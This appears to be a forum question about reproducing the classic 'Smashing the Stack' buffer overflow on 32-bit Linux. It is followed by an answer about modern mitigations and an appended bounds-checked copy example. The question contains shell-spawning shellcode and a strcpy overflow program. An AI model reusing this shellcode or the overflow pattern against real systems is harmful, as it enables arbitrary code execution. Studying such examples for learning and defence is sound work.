
Using strcpy & buffer overflow to execute shell code

I've been going through "Smashing the stack for fun and profit" and am having issues executing shell code through a buffer overflow.

Running on Linux, Ubuntu 32-bit via VirtualBox, gcc compiler with -fno-stack-protector -ggdb -g tags.

My code is identical to the reading and I don't understand why it's not working. I get a segmentation fault. When I use gdb to debug, it says "0x08048268 in ??", which I know means it can't find the address in the scope. I don't understand why it shouldn't be able to.

I am compiling with stack guard off as well.

    #include <string.h>   /* strlen, strcpy */

    char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
                       "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
                       "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    char large_string[128];

    void main() {
        char buffer[96];
        int i;
        long *long_ptr = (long *) large_string;

        /* fill large_string with the address of buffer, one word at a time */
        for (i = 0; i < 32; i++)
            *(long_ptr + i) = (int) buffer;
        /* place the shellcode at the start of large_string */
        for (i = 0; i < strlen(shellcode); i++)
            large_string[i] = shellcode[i];
        large_string[127] = '\0';
        /* unbounded copy of a 128-byte source into the 96-byte buffer */
        strcpy(buffer, large_string);
    }

That's an old article, but I've cited it too. The problem is that your code is “identical to the reading.” Those aren't magic numbers from a script. Pay close attention to how Aleph One determined which values to smash the stack with for that program.

And keep in mind that the article is from 1996, and the kernel and GCC devs have read it too.
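
Added example (not part of the original post or of the article it cites): the defensive counterpart of the `strcpy(buffer, large_string)` call in the question, using the same 96- and 128-byte sizes. `copy_checked`, `overrun_bytes` and `fill_large` are hypothetical names, and the filler bytes are constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   96   /* size of `buffer` in the question */
#define LARGE_SIZE 128  /* size of `large_string` in the question */

/* Hypothetical helper: copy src into dst only if it fits, NUL included.
 * Returns 0 on success, -1 if src needs more than dst_size bytes
 * (dst is then left as an empty string instead of being overrun). */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    const char *end = memchr(src, '\0', dst_size); /* never scans past dst_size */
    if (end == NULL) {                             /* no terminator within bounds */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Bytes strcpy() would write past the end of a dst_size buffer for this src. */
size_t overrun_bytes(size_t dst_size, const char *src)
{
    size_t needed = strlen(src) + 1;
    return needed > dst_size ? needed - dst_size : 0;
}

/* Constructed stand-in for large_string: 127 filler bytes plus NUL. */
void fill_large(char *large)
{
    memset(large, 'A', LARGE_SIZE - 1);
    large[LARGE_SIZE - 1] = '\0';
}

int main(void)
{
    char large[LARGE_SIZE], buffer[BUF_SIZE];
    fill_large(large);
    printf("strcpy would overrun by %zu bytes\n", overrun_bytes(BUF_SIZE, large));
    printf("copy_checked -> %d\n", copy_checked(buffer, sizeof buffer, large));
    printf("short copy   -> %d (%s)\n", copy_checked(buffer, sizeof buffer, "ok"), buffer);
    return 0;
}
```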
